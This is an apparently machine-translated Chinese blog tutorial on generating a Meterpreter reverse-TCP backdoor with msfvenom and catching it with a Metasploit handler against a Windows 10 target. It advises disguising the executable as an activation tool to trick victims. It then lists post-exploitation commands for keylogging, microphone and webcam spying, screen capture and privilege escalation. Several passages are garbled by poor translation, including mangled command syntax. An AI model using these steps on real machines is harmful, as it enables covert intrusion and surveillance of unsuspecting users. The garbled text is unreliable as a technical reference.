我最近整理了壹些奇怪的信件&;華為&;我對大榭的課件資料和大昌的采訪題目深信不疑。想要的話可以私信拿,免費送給粉絲朋友~
MSF Venom是壹個metasploit獨立有效負載生成器,也是MSF有效負載和MSF encode的替代品。是用來生成後門的軟件。
MSFvenom是Msfpayload和Msfencode的組合,這兩個工具都放在壹個框架實例中。自2015年6月8日起,msfvenom已取代msfpayload和msfencode。
演示環境
使用Kali 2021.3進行演示操作。
目標無人機:Win10專業版
軟件:msfvenom、MSF控制臺(內置於Kali系統中)
1.進入管理員模式
指揮官:須藤素
解釋:如果不在管理員模式下運行,可能會提示您權限不足。為了避免命令執行失敗,請在管理員下運行以下命令。
命令:MSF venom-p windows/meter preter/reverse _ tcplhost = local IP》;LPORT=本地端口號》–f exe–o文件名》。可執行程序的擴展名
說明:本地ip寫自己Kali的IP地址,妳可以用ifconfig查看自己Kali的IP地址。
本地端口可以隨意設置未占用的端口號。如果端口號被占用,文件生成將失敗,因此只需更改端口號。
您可以在文件名中寫入您喜歡的名稱,例如寫入Win10激活工具,這可能會使目標主機更容易上鉤。
當然,MSF也可以用於滲透手機、MAC、Linux等。
接下來,運行命令生成文件。
默認生成的文件位於根目錄中。
將剛剛生成的文件放入目標無人機Win10系統中。
命令:msfconsole
(1)命令:使用漏洞利用/多重/處理程序(選擇模塊)
(2)命令:set payload windows/meter preter/reverse _ TCP(選擇攻擊模塊)。
(3)命令:設置lhost 192 . 168 . 32 . 1(填寫自己主機的IP地址)。
(4)命令:設置lport 111(填寫剛才生成文件時的端口號)。
(5)命令:顯示選項(查看設置參數)
(6)命令:exploit -z -j(後臺執行)
我們還可以在這裏偽裝這個程序,更改它的圖標,或將其綁定到某些軟件,並在用戶打開它時自動安裝到另壹臺計算機上。
(1)命令:會話(查看掛鉤用戶)
(2)命令:sessions -i 1(選擇被攻擊的用戶,這裏選擇1。
命令:運行vnc -i
Cmd指令:
Cat將文件的內容讀取到屏幕上
Cd更改目錄
校驗和檢索文件的校驗和。
Cp將源復制到目標。
Del刪除指定的文件
目錄列表文件(ls的別名)
下載下載文件或目錄
編輯編輯文件
Getlwd打印本地工作目錄。
Getwd打印工作目錄
Lcd改變本地工作目錄
Lls列出本地文件。
Lpwd打印本地工作目錄。
Ls列表文件
Mkdir創建目錄
mv將源移動到目標。
Pwd打印工作目錄
Rm刪除指定的文件。
Rmdir刪除目錄
搜索搜索文件
Show_mount列出所有掛載點/邏輯驅動器。
上傳上傳文件或目錄。
Pkill通過名稱終止進程。
Keyscan_start開始捕獲擊鍵(開始鍵盤記錄)。
Keyscan_dump轉儲鍵緩沖區(下載鍵盤記錄)
Keyscan_stop停止捕獲擊鍵(停止鍵盤記錄)。
Record_mic距離默認麥克風record_mic音頻錄制(音頻錄制)X秒。
網絡攝像頭_聊天開始視頻聊天(視頻時,對方會有壹個彈出窗口)。
網絡攝像頭列表單個攝像頭(查看攝像頭列表)
網絡攝像頭_快照從指定的相機拍攝快照(相機拍攝照片)。
網絡攝像機流播放指定攝像機的視頻流(攝像機監控已打開)。
Enumdesktops列出所有可訪問的桌面和窗口(窗體列表)。
獲取當前的Meterpreter桌面。
重新啟動重新啟動遠程計算機。
關機關閉遠程計算機。
Shell進入系統命令shell。
Enumdesktops列出所有可訪問的桌面和窗口。
獲取當前的meterpreter桌面。
Idletime返回遠程用戶空閑的秒數。
鍵盤_發送發送擊鍵
發送壹個按鍵事件。
Keyscan_dump轉儲擊鍵緩沖區。
Keyscan_start開始捕獲擊鍵。
Keyscan_stop停止捕獲擊鍵。
鼠標發送鼠標事件。
遠程用戶桌面的屏幕共享實時查看
截圖捕獲交互式桌面的截圖。
Setdesktop更改Meterpreters的當前桌面。
Uictl控制壹些用戶界面模塊。
Record_mic錄制來自默認麥克風的音頻x秒。
網絡攝像頭_聊天開始視頻聊天
列出網絡攝像頭。
網絡攝像頭快照從指定的網絡攝像頭拍攝快照。
網絡攝像頭流播放指定網絡攝像頭的視頻流。
播放播放波形音頻文件(。wav)安裝在目標系統上。
Getsystem試圖將您的權限提升到本地系統的權限。
執行-f記事本打開記事本。
————————————————
原始鏈接:/rfz _ 322/article/details/123367668